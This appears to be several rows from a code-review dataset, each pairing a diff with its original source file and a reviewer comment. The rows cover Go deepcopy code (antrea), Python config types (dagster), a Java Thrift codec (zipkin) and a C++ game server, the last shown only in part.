DeepCopyInto(out *ResourceImportCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportCondition. func (in *ResourceImportCondition) DeepCopy() *ResourceImportCondition { if in == nil { return nil } out := new(ResourceImportCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportFilter) DeepCopyInto(out *ResourceImportFilter) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) out.Spec = in.Spec out.Status = in.Status } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilter. func (in *ResourceImportFilter) DeepCopy() *ResourceImportFilter { if in == nil { return nil } out := new(ResourceImportFilter) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImportFilter) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportFilterList) DeepCopyInto(out *ResourceImportFilterList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceImportFilter, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilterList. func (in *ResourceImportFilterList) DeepCopy() *ResourceImportFilterList { if in == nil { return nil } out := new(ResourceImportFilterList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImportFilterList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportFilterSpec) DeepCopyInto(out *ResourceImportFilterSpec) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilterSpec. func (in *ResourceImportFilterSpec) DeepCopy() *ResourceImportFilterSpec { if in == nil { return nil } out := new(ResourceImportFilterSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportFilterStatus) DeepCopyInto(out *ResourceImportFilterStatus) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilterStatus. func (in *ResourceImportFilterStatus) DeepCopy() *ResourceImportFilterStatus { if in == nil { return nil } out := new(ResourceImportFilterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportList) DeepCopyInto(out *ResourceImportList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceImport, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportList. func (in *ResourceImportList) DeepCopy() *ResourceImportList { if in == nil { return nil } out := new(ResourceImportList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImportList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportSpec) DeepCopyInto(out *ResourceImportSpec) { *out = *in if in.ClusterIDs != nil { in, out := &in.ClusterIDs, &out.ClusterIDs *out = make([]string, len(*in)) copy(*out, *in) } if in.ServiceImport != nil { in, out := &in.ServiceImport, &out.ServiceImport *out = new(apisv1alpha1.ServiceImport) (*in).DeepCopyInto(*out) } if in.Endpoints != nil { in, out := &in.Endpoints, &out.Endpoints *out = new(EndpointsImport) (*in).DeepCopyInto(*out) } if in.ExternalEntity != nil { in, out := &in.ExternalEntity, &out.ExternalEntity *out = new(ExternalEntityImport) (*in).DeepCopyInto(*out) } if in.Raw != nil { in, out := &in.Raw, &out.Raw *out = new(RawResourceImport) (*in).DeepCopyInto(*out) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportSpec. func (in *ResourceImportSpec) DeepCopy() *ResourceImportSpec { if in == nil { return nil } out := new(ResourceImportSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportStatus) DeepCopyInto(out *ResourceImportStatus) { *out = *in if in.ClusterStatuses != nil { in, out := &in.ClusterStatuses, &out.ClusterStatuses *out = make([]ResourceImportClusterStatus, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportStatus. func (in *ResourceImportStatus) DeepCopy() *ResourceImportStatus { if in == nil { return nil } out := new(ResourceImportStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ServiceExport) DeepCopyInto(out *ServiceExport) { *out = *in in.ServiceSpec.DeepCopyInto(&out.ServiceSpec) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ServiceExport. func (in *ServiceExport) DeepCopy() *ServiceExport { if in == nil { return nil } out := new(ServiceExport) in.DeepCopyInto(out) return out }
1
46,159
why is this needed?
antrea-io-antrea
go
@@ -23,7 +23,7 @@ DEFAULT_TYPE_ATTRIBUTES = ConfigTypeAttributes() class ConfigType(object): - def __init__(self, name=None, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None): + def __init__(self, key, name, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None): type_obj = type(self) if type_obj in ConfigType.__cache:
1
from collections import namedtuple import six from dagster import check from .builtin_enum import BuiltinEnum class ConfigTypeAttributes( namedtuple('_ConfigTypeAttributes', 'is_builtin is_system_config is_named') ): def __new__(cls, is_builtin=False, is_system_config=False, is_named=True): return super(ConfigTypeAttributes, cls).__new__( cls, is_builtin=check.bool_param(is_builtin, 'is_builtin'), is_system_config=check.bool_param(is_system_config, 'is_system_config'), is_named=check.bool_param(is_named, 'is_named'), ) DEFAULT_TYPE_ATTRIBUTES = ConfigTypeAttributes() class ConfigType(object): def __init__(self, name=None, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None): type_obj = type(self) if type_obj in ConfigType.__cache: check.failed( ( '{type_obj} already in cache. You **must** use the inst() class method ' 'to construct ConfigTypes and not the ctor'.format(type_obj=type_obj) ) ) self.name = check.opt_str_param(name, 'name', type(self).__name__) self.description = check.opt_str_param(description, 'description') self.type_attributes = check.inst_param( type_attributes, 'type_attributes', ConfigTypeAttributes ) __cache = {} @classmethod def inst(cls): if cls not in ConfigType.__cache: ConfigType.__cache[cls] = cls() return ConfigType.__cache[cls] @staticmethod def from_builtin_enum(builtin_enum): check.inst_param(builtin_enum, 'builtin_enum', BuiltinEnum) return _CONFIG_MAP[builtin_enum] @property def is_system_config(self): return self.type_attributes.is_system_config @property def is_builtin(self): return self.type_attributes.is_builtin @property def is_named(self): return self.type_attributes.is_named @property def has_fields(self): return self.is_composite or self.is_selector @property def is_scalar(self): return False @property def is_list(self): return False @property def is_nullable(self): return False @property def is_composite(self): return False @property def is_selector(self): return False @property def is_any(self): return False @property def inner_types(self): return [] @property def is_enum(self): return False # Scalars, Composites, Selectors, Lists, Nullable, Any class ConfigScalar(ConfigType): @property def is_scalar(self): return True def is_config_scalar_valid(self, _config_value): check.not_implemented('must implement') class ConfigList(ConfigType): def __init__(self, inner_type, *args, **kwargs): self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType) super(ConfigList, self).__init__(*args, **kwargs) def is_list(self): return True @property def inner_types(self): return [self.inner_type] + self.inner_type.inner_types class ConfigNullable(ConfigType): def __init__(self, inner_type, *args, **kwargs): self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType) super(ConfigNullable, self).__init__(*args, **kwargs) @property def is_nullable(self): return True @property def inner_types(self): return [self.inner_type] + self.inner_type.inner_types class ConfigAny(ConfigType): @property def is_any(self): return True class BuiltinConfigScalar(ConfigScalar): def __init__(self, name=None, description=None): super(BuiltinConfigScalar, self).__init__( name=name, description=description, type_attributes=ConfigTypeAttributes(is_builtin=True), ) class Int(BuiltinConfigScalar): def __init__(self): super(Int, self).__init__(description='') def is_config_scalar_valid(self, config_value): return not isinstance(config_value, bool) and isinstance(config_value, six.integer_types) class _StringishBuiltin(BuiltinConfigScalar): def is_config_scalar_valid(self, config_value): return isinstance(config_value, six.string_types) class String(_StringishBuiltin): def __init__(self): super(String, self).__init__(description='') class Path(_StringishBuiltin): def __init__(self): super(Path, self).__init__(description='') class Bool(BuiltinConfigScalar): def __init__(self): super(Bool, self).__init__(description='') def is_config_scalar_valid(self, config_value): return isinstance(config_value, bool) class Float(BuiltinConfigScalar): def __init__(self): super(Float, self).__init__(description='') def is_config_scalar_valid(self, config_value): return isinstance(config_value, float) class Any(ConfigAny): def __init__(self): super(Any, self).__init__(type_attributes=ConfigTypeAttributes(is_builtin=True)) def Nullable(inner_type): check.inst_param(inner_type, 'inner_type', ConfigType) class _Nullable(ConfigNullable): def __init__(self): super(_Nullable, self).__init__( name='Nullable.{inner_type}'.format(inner_type=inner_type.name), type_attributes=ConfigTypeAttributes(is_builtin=True, is_named=False), inner_type=inner_type, ) return _Nullable def List(inner_type): check.inst_param(inner_type, 'inner_type', ConfigType) class _List(ConfigList): def __init__(self): super(_List, self).__init__( name='List.{inner_type}'.format(inner_type=inner_type.name), description='List of {inner_type}'.format(inner_type=inner_type.name), type_attributes=ConfigTypeAttributes(is_builtin=True, is_named=False), inner_type=inner_type, ) return _List class EnumValue: def __init__(self, config_value, python_value=None, description=None): self.config_value = check.str_param(config_value, 'config_value') self.python_value = config_value if python_value is None else python_value self.description = check.opt_str_param(description, 'description') class ConfigEnum(ConfigType): def __init__(self, name, enum_values): super(ConfigEnum, self).__init__(name=check.str_param(name, 'name')) self.enum_values = check.list_param(enum_values, 'enum_values', of_type=EnumValue) self._valid_python_values = {ev.python_value for ev in enum_values} check.invariant(len(self._valid_python_values) == len(enum_values)) self._valid_config_values = {ev.config_value for ev in enum_values} check.invariant(len(self._valid_config_values) == len(enum_values)) @property def config_values(self): return [ev.config_value for ev in self.enum_values] @property def is_enum(self): return True def is_valid_config_enum_value(self, config_value): return config_value in self._valid_config_values def to_python_value(self, config_value): for ev in self.enum_values: if ev.config_value == config_value: return ev.python_value check.failed('should never reach this. config_value should be pre-validated') def Enum(name, enum_values): class _EnumType(ConfigEnum): def __init__(self): super(_EnumType, self).__init__(name=name, enum_values=enum_values) return _EnumType _CONFIG_MAP = { BuiltinEnum.ANY: Any.inst(), BuiltinEnum.BOOL: Bool.inst(), BuiltinEnum.FLOAT: Float.inst(), BuiltinEnum.INT: Int.inst(), BuiltinEnum.PATH: Path.inst(), BuiltinEnum.STRING: String.inst(), }
1
12,227
I wonder if it'd be possible to autogenerate a key from the name within this function if one is not provided explicitly, rather than having all the callsites pass both the name and key (and usually as the same value)? Might give us a good place to implement a `name->key` function that isn't 1:1.
dagster-io-dagster
py
@@ -110,6 +110,7 @@ public final class ThriftCodec implements Codec { final Field IPV4 = new Field(TYPE_I32, 1); final Field PORT = new Field(TYPE_I16, 2); final Field SERVICE_NAME = new Field(TYPE_STRING, 3); + final Field IPV6 = new Field(TYPE_STRING, 4); @Override public Endpoint read(ByteBuffer bytes) {
1
/** * Copyright 2015-2016 The OpenZipkin Authors * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package zipkin.internal; import java.io.EOFException; import java.nio.BufferUnderflowException; import java.nio.ByteBuffer; import java.util.ArrayList; import java.util.Collections; import java.util.List; import okio.Buffer; import zipkin.Annotation; import zipkin.BinaryAnnotation; import zipkin.Codec; import zipkin.DependencyLink; import zipkin.Endpoint; import zipkin.Span; import static zipkin.internal.Util.UTF_8; import static zipkin.internal.Util.checkArgument; /** * This is a hard-coded thrift codec, which allows us to include thrift marshalling in a minified * core jar. The hard coding not only keeps us with a single data-model, it also allows the minified * core jar free of SLFJ classes otherwise included in generated types. * * <p> This directly implements TBinaryProtocol so as to reduce dependencies and array duplication. * While reads internally use {@link ByteBuffer}, writes use {@link Buffer} as the latter can grow. */ public final class ThriftCodec implements Codec { // break vs decode huge structs, like > 1MB strings or 10k spans in a trace. static final int STRING_LENGTH_LIMIT = 1 * 1024 * 1024; static final int CONTAINER_LENGTH_LIMIT = 10 * 1000; // break vs recursing infinitely when skipping data private static int MAX_SKIP_DEPTH = 2147483647; // taken from org.apache.thrift.protocol.TType static final byte TYPE_STOP = 0; static final byte TYPE_BOOL = 2; static final byte TYPE_BYTE = 3; static final byte TYPE_DOUBLE = 4; static final byte TYPE_I16 = 6; static final byte TYPE_I32 = 8; static final byte TYPE_I64 = 10; static final byte TYPE_STRING = 11; static final byte TYPE_STRUCT = 12; static final byte TYPE_MAP = 13; static final byte TYPE_SET = 14; static final byte TYPE_LIST = 15; /** * Added for DataStax Cassandra driver, which returns data in ByteBuffers. The implementation * takes care not to re-buffer the data. * * @throws {@linkplain IllegalArgumentException} if the span couldn't be decoded */ public Span readSpan(ByteBuffer bytes) { return read(SPAN_ADAPTER, bytes); } @Override public Span readSpan(byte[] bytes) { return read(SPAN_ADAPTER, ByteBuffer.wrap(bytes)); } @Override public byte[] writeSpan(Span value) { return write(SPAN_ADAPTER, value); } @Override public List<Span> readSpans(byte[] bytes) { return read(SPANS_ADAPTER, ByteBuffer.wrap(bytes)); } @Override public byte[] writeSpans(List<Span> value) { return write(SPANS_ADAPTER, value); } @Override public byte[] writeTraces(List<List<Span>> value) { return write(TRACES_ADAPTER, value); } interface ThriftWriter<T> { void write(T value, Buffer buffer); } interface ThriftReader<T> { T read(ByteBuffer bytes); } interface ThriftAdapter<T> extends ThriftReader<T>, ThriftWriter<T> { } static final ThriftAdapter<Endpoint> ENDPOINT_ADAPTER = new ThriftAdapter<Endpoint>() { final Field IPV4 = new Field(TYPE_I32, 1); final Field PORT = new Field(TYPE_I16, 2); final Field SERVICE_NAME = new Field(TYPE_STRING, 3); @Override public Endpoint read(ByteBuffer bytes) { Endpoint.Builder result = Endpoint.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(IPV4)) { result.ipv4(bytes.getInt()); } else if (field.isEqualTo(PORT)) { result.port(bytes.getShort()); } else if (field.isEqualTo(SERVICE_NAME)) { result.serviceName(readUtf8(bytes)); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(Endpoint value, Buffer buffer) { IPV4.write(buffer); buffer.writeInt(value.ipv4); PORT.write(buffer); buffer.writeShort(value.port == null ? 0 : value.port); SERVICE_NAME.write(buffer); writeUtf8(buffer, value.serviceName); buffer.writeByte(TYPE_STOP); } }; static final ThriftAdapter<Annotation> ANNOTATION_ADAPTER = new ThriftAdapter<Annotation>() { final Field TIMESTAMP = new Field(TYPE_I64, 1); final Field VALUE = new Field(TYPE_STRING, 2); final Field ENDPOINT = new Field(TYPE_STRUCT, 3); @Override public Annotation read(ByteBuffer bytes) { Annotation.Builder result = Annotation.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(TIMESTAMP)) { result.timestamp(bytes.getLong()); } else if (field.isEqualTo(VALUE)) { result.value(readUtf8(bytes)); } else if (field.isEqualTo(ENDPOINT)) { result.endpoint(ENDPOINT_ADAPTER.read(bytes)); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(Annotation value, Buffer buffer) { TIMESTAMP.write(buffer); buffer.writeLong(value.timestamp); if (value.value != null) { VALUE.write(buffer); writeUtf8(buffer, value.value); } if (value.endpoint != null) { ENDPOINT.write(buffer); ENDPOINT_ADAPTER.write(value.endpoint, buffer); } buffer.writeByte(TYPE_STOP); } }; static final ThriftAdapter<BinaryAnnotation> BINARY_ANNOTATION_ADAPTER = new ThriftAdapter<BinaryAnnotation>() { final Field KEY = new Field(TYPE_STRING, 1); final Field VALUE = new Field(TYPE_STRING, 2); final Field TYPE = new Field(TYPE_I32, 3); final Field ENDPOINT = new Field(TYPE_STRUCT, 4); @Override public BinaryAnnotation read(ByteBuffer bytes) { BinaryAnnotation.Builder result = BinaryAnnotation.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(KEY)) { result.key(readUtf8(bytes)); } else if (field.isEqualTo(VALUE)) { result.value(readByteArray(bytes)); } else if (field.isEqualTo(TYPE)) { result.type(BinaryAnnotation.Type.fromValue(bytes.getInt())); } else if (field.isEqualTo(ENDPOINT)) { result.endpoint(ENDPOINT_ADAPTER.read(bytes)); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(BinaryAnnotation value, Buffer buffer) { KEY.write(buffer); writeUtf8(buffer, value.key); VALUE.write(buffer); buffer.writeInt(value.value.length); buffer.write(value.value); TYPE.write(buffer); buffer.writeInt(value.type.value); if (value.endpoint != null) { ENDPOINT.write(buffer); ENDPOINT_ADAPTER.write(value.endpoint, buffer); } buffer.writeByte(TYPE_STOP); } }; static final ThriftAdapter<List<Annotation>> ANNOTATIONS_ADAPTER = new ListAdapter<>(ANNOTATION_ADAPTER); static final ThriftAdapter<List<BinaryAnnotation>> BINARY_ANNOTATIONS_ADAPTER = new ListAdapter<>(BINARY_ANNOTATION_ADAPTER); static final ThriftAdapter<Span> SPAN_ADAPTER = new ThriftAdapter<Span>() { final Field TRACE_ID = new Field(TYPE_I64, 1); final Field NAME = new Field(TYPE_STRING, 3); final Field ID = new Field(TYPE_I64, 4); final Field PARENT_ID = new Field(TYPE_I64, 5); final Field ANNOTATIONS = new Field(TYPE_LIST, 6); final Field BINARY_ANNOTATIONS = new Field(TYPE_LIST, 8); final Field DEBUG = new Field(TYPE_BOOL, 9); final Field TIMESTAMP = new Field(TYPE_I64, 10); final Field DURATION = new Field(TYPE_I64, 11); @Override public Span read(ByteBuffer bytes) { Span.Builder result = Span.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(TRACE_ID)) { result.traceId(bytes.getLong()); } else if (field.isEqualTo(NAME)) { result.name(readUtf8(bytes)); } else if (field.isEqualTo(ID)) { result.id(bytes.getLong()); } else if (field.isEqualTo(PARENT_ID)) { result.parentId(bytes.getLong()); } else if (field.isEqualTo(ANNOTATIONS)) { result.annotations(ANNOTATIONS_ADAPTER.read(bytes)); } else if (field.isEqualTo(BINARY_ANNOTATIONS)) { result.binaryAnnotations(BINARY_ANNOTATIONS_ADAPTER.read(bytes)); } else if (field.isEqualTo(DEBUG)) { result.debug(bytes.get() == 1); } else if (field.isEqualTo(TIMESTAMP)) { result.timestamp(bytes.getLong()); } else if (field.isEqualTo(DURATION)) { result.duration(bytes.getLong()); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(Span value, Buffer buffer) { TRACE_ID.write(buffer); buffer.writeLong(value.traceId); NAME.write(buffer); writeUtf8(buffer, value.name); ID.write(buffer); buffer.writeLong(value.id); if (value.parentId != null) { PARENT_ID.write(buffer); buffer.writeLong(value.parentId); } ANNOTATIONS.write(buffer); ANNOTATIONS_ADAPTER.write(value.annotations, buffer); BINARY_ANNOTATIONS.write(buffer); BINARY_ANNOTATIONS_ADAPTER.write(value.binaryAnnotations, buffer); if (value.debug != null) { DEBUG.write(buffer); buffer.writeByte(value.debug ? 1 : 0); } if (value.timestamp != null) { TIMESTAMP.write(buffer); buffer.writeLong(value.timestamp); } if (value.duration != null) { DURATION.write(buffer); buffer.writeLong(value.duration); } buffer.writeByte(TYPE_STOP); } @Override public String toString() { return "Span"; } }; static final ThriftAdapter<List<Span>> SPANS_ADAPTER = new ListAdapter<>(SPAN_ADAPTER); static final ThriftAdapter<List<List<Span>>> TRACES_ADAPTER = new ListAdapter<>(SPANS_ADAPTER); static final ThriftAdapter<DependencyLink> DEPENDENCY_LINK_ADAPTER = new ThriftAdapter<DependencyLink>() { final Field PARENT = new Field(TYPE_STRING, 1); final Field CHILD = new Field(TYPE_STRING, 2); final Field CALL_COUNT = new Field(TYPE_I64, 4); @Override public DependencyLink read(ByteBuffer bytes) { DependencyLink.Builder result = DependencyLink.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(PARENT)) { result.parent(readUtf8(bytes)); } else if (field.isEqualTo(CHILD)) { result.child(readUtf8(bytes)); } else if (field.isEqualTo(CALL_COUNT)) { result.callCount(bytes.getLong()); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(DependencyLink value, Buffer buffer) { PARENT.write(buffer); writeUtf8(buffer, value.parent); CHILD.write(buffer); writeUtf8(buffer, value.child); CALL_COUNT.write(buffer); buffer.writeLong(value.callCount); buffer.writeByte(TYPE_STOP); } @Override public String toString() { return "DependencyLink"; } }; static final ThriftAdapter<List<DependencyLink>> DEPENDENCY_LINKS_ADAPTER = new ListAdapter<>(DEPENDENCY_LINK_ADAPTER); /** * Added for DataStax Cassandra driver, which returns data in ByteBuffers. The implementation * takes care not to re-buffer the data. * * @throws {@linkplain IllegalArgumentException} if the links couldn't be decoded */ public List<DependencyLink> readDependencyLinks(ByteBuffer bytes) { return read(DEPENDENCY_LINKS_ADAPTER, bytes); } @Override public List<DependencyLink> readDependencyLinks(byte[] bytes) { return read(DEPENDENCY_LINKS_ADAPTER, ByteBuffer.wrap(bytes)); } @Override public byte[] writeDependencyLinks(List<DependencyLink> value) { return write(DEPENDENCY_LINKS_ADAPTER, value); } static <T> T read(ThriftReader<T> reader, ByteBuffer bytes) { checkArgument(bytes.remaining() > 0, "Empty input reading %s", reader); try { return reader.read(bytes); } catch (RuntimeException e) { throw exceptionReading(reader.toString(), bytes, e); } } /** Inability to encode is a programming bug. */ static <T> byte[] write(ThriftWriter<T> writer, T value) { Buffer buffer = new Buffer(); try { writer.write(value, buffer); } catch (RuntimeException e) { throw new AssertionError("Could not write " + value + " as TBinary", e); } return buffer.readByteArray(); } static <T> List<T> readList(ThriftReader<T> reader, ByteBuffer bytes) { byte ignoredType = bytes.get(); int length = guardLength(bytes, CONTAINER_LENGTH_LIMIT); if (length == 0) return Collections.emptyList(); if (length == 1) return Collections.singletonList(reader.read(bytes)); List<T> result = new ArrayList<>(length); for (int i = 0; i < length; i++) { result.add(reader.read(bytes)); } return result; } static <T> void writeList(ThriftWriter<T> writer, List<T> value, Buffer buffer) { int length = value.size(); writeListBegin(buffer, length); for (int i = 0; i < length; i++) { writer.write(value.get(i), buffer); } } static final class ListAdapter<T> implements ThriftAdapter<List<T>> { final ThriftAdapter<T> adapter; ListAdapter(ThriftAdapter<T> adapter) { this.adapter = adapter; } @Override public List<T> read(ByteBuffer bytes) { return readList(adapter, bytes); } @Override public void write(List<T> value, Buffer buffer) { writeList(adapter, value, buffer); } @Override public String toString() { return "List<" + adapter + ">"; } } static IllegalArgumentException exceptionReading(String type, ByteBuffer bytes, Exception e) { String cause = e.getMessage() == null ? "Error" : e.getMessage(); if (e instanceof EOFException) cause = "EOF"; if (e instanceof IllegalStateException || e instanceof BufferUnderflowException) cause = "Malformed"; String message = String.format("%s reading %s from TBinary: ", cause, type, bytes); throw new IllegalArgumentException(message, e); } static final class Field { final byte type; final int id; Field(byte type, int id) { this.type = type; this.id = id; } void write(Buffer buffer) { buffer.writeByte(type); buffer.writeShort(id); } static Field read(ByteBuffer bytes) { byte type = bytes.get(); return new Field(type, type == TYPE_STOP ? TYPE_STOP : bytes.getShort()); } boolean isEqualTo(Field that) { return this.type == that.type && this.id == that.id; } } static void skip(ByteBuffer bytes, byte type) { skip(bytes, type, MAX_SKIP_DEPTH); } static void skip(ByteBuffer bytes, byte type, int maxDepth) { if (maxDepth <= 0) throw new IllegalStateException("Maximum skip depth exceeded"); switch (type) { case TYPE_BOOL: case TYPE_BYTE: skip(bytes, 1); break; case TYPE_I16: skip(bytes, 2); break; case TYPE_I32: skip(bytes, 4); break; case TYPE_DOUBLE: case TYPE_I64: skip(bytes, 8); break; case TYPE_STRING: int size = guardLength(bytes, STRING_LENGTH_LIMIT); skip(bytes, size); break; case TYPE_STRUCT: while (true) { Field field = Field.read(bytes); if (field.type == TYPE_STOP) return; skip(bytes, field.type, maxDepth - 1); } case TYPE_MAP: byte keyType = bytes.get(); byte valueType = bytes.get(); for (int i = 0, length = guardLength(bytes, CONTAINER_LENGTH_LIMIT); i < length; i++) { skip(bytes, keyType, maxDepth - 1); skip(bytes, valueType, maxDepth - 1); } break; case TYPE_SET: case TYPE_LIST: byte elemType = bytes.get(); for (int i = 0, length = guardLength(bytes, CONTAINER_LENGTH_LIMIT); i < length; i++) { skip(bytes, elemType, maxDepth - 1); } break; default: // types that don't need explicit skipping break; } } static void skip(ByteBuffer bytes, int count) { bytes.position(bytes.position() + count); } static byte[] readByteArray(ByteBuffer bytes) { byte[] result = new byte[guardLength(bytes, STRING_LENGTH_LIMIT)]; bytes.get(result); return result; } static String readUtf8(ByteBuffer bytes) { return new String(readByteArray(bytes), UTF_8); } static int guardLength(ByteBuffer bytes, int limit) { int length = bytes.getInt(); if (length > limit) { // don't allocate massive arrays throw new IllegalStateException(length + " > " + limit + ": possibly malformed thrift"); } return length; } static void writeListBegin(Buffer buffer, int size) { buffer.writeByte(TYPE_STRUCT); buffer.writeInt(size); } static void writeUtf8(Buffer buffer, String string) { Buffer temp = new Buffer().writeUtf8(string); buffer.writeInt((int) temp.size()); buffer.write(temp, temp.size()); } }
1
11,374
@adriancole I do not see a change in the thrift file. Are there unit tests verifying that this manual serialization is compatible with the native Thrift serialization done by classes generated from `.thrift` IDL file?
openzipkin-zipkin
java
@@ -506,7 +506,7 @@ Player* Game::getPlayerByGUID(const uint32_t& guid) ReturnValue Game::getPlayerByNameWildcard(const std::string& s, Player*& player) { size_t strlen = s.length(); - if (strlen == 0 || strlen > 20) { + if (strlen == 0 || strlen > PLAYER_NAME_LENGHT) { return RETURNVALUE_PLAYERWITHTHISNAMEISNOTONLINE; }
1
/** * The Forgotten Server - a free and open-source MMORPG server emulator * Copyright (C) 2019 Mark Samman <[email protected]> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include "otpch.h" #include "pugicast.h" #include "actions.h" #include "bed.h" #include "configmanager.h" #include "creature.h" #include "creatureevent.h" #include "databasetasks.h" #include "events.h" #include "game.h" #include "globalevent.h" #include "iologindata.h" #include "iomarket.h" #include "items.h" #include "monster.h" #include "movement.h" #include "scheduler.h" #include "server.h" #include "spells.h" #include "talkaction.h" #include "weapons.h" #include "script.h" #include <fmt/format.h> extern ConfigManager g_config; extern Actions* g_actions; extern Chat* g_chat; extern TalkActions* g_talkActions; extern Spells* g_spells; extern Vocations g_vocations; extern GlobalEvents* g_globalEvents; extern CreatureEvents* g_creatureEvents; extern Events* g_events; extern Monsters g_monsters; extern MoveEvents* g_moveEvents; extern Weapons* g_weapons; extern Scripts* g_scripts; Game::Game() { offlineTrainingWindow.defaultEnterButton = 1; offlineTrainingWindow.defaultEscapeButton = 0; offlineTrainingWindow.choices.emplace_back("Sword Fighting and Shielding", SKILL_SWORD); offlineTrainingWindow.choices.emplace_back("Axe Fighting and Shielding", SKILL_AXE); offlineTrainingWindow.choices.emplace_back("Club Fighting and Shielding", SKILL_CLUB); offlineTrainingWindow.choices.emplace_back("Distance Fighting and Shielding", SKILL_DISTANCE); offlineTrainingWindow.choices.emplace_back("Magic Level and Shielding", SKILL_MAGLEVEL); offlineTrainingWindow.buttons.emplace_back("Okay", offlineTrainingWindow.defaultEnterButton); offlineTrainingWindow.buttons.emplace_back("Cancel", offlineTrainingWindow.defaultEscapeButton); offlineTrainingWindow.priority = true; } Game::~Game() { for (const auto& it : guilds) { delete it.second; } } void Game::start(ServiceManager* manager) { serviceManager = manager; updateWorldTime(); if (g_config.getBoolean(ConfigManager::DEFAULT_WORLD_LIGHT)) { g_scheduler.addEvent(createSchedulerTask(EVENT_LIGHTINTERVAL, std::bind(&Game::checkLight, this))); } g_scheduler.addEvent(createSchedulerTask(EVENT_CREATURE_THINK_INTERVAL, std::bind(&Game::checkCreatures, this, 0))); g_scheduler.addEvent(createSchedulerTask(EVENT_DECAYINTERVAL, std::bind(&Game::checkDecay, this))); } GameState_t Game::getGameState() const { return gameState; } void Game::setWorldType(WorldType_t type) { worldType = type; } void Game::setGameState(GameState_t newState) { if (gameState == GAME_STATE_SHUTDOWN) { return; //this cannot be stopped } if (gameState == newState) { return; } gameState = newState; switch (newState) { case GAME_STATE_INIT: { groups.load(); g_chat->load(); map.spawns.startup(); raids.loadFromXml(); raids.startup(); quests.loadFromXml(); mounts.loadFromXml(); loadMotdNum(); loadPlayersRecord(); loadAccountStorageValues(); 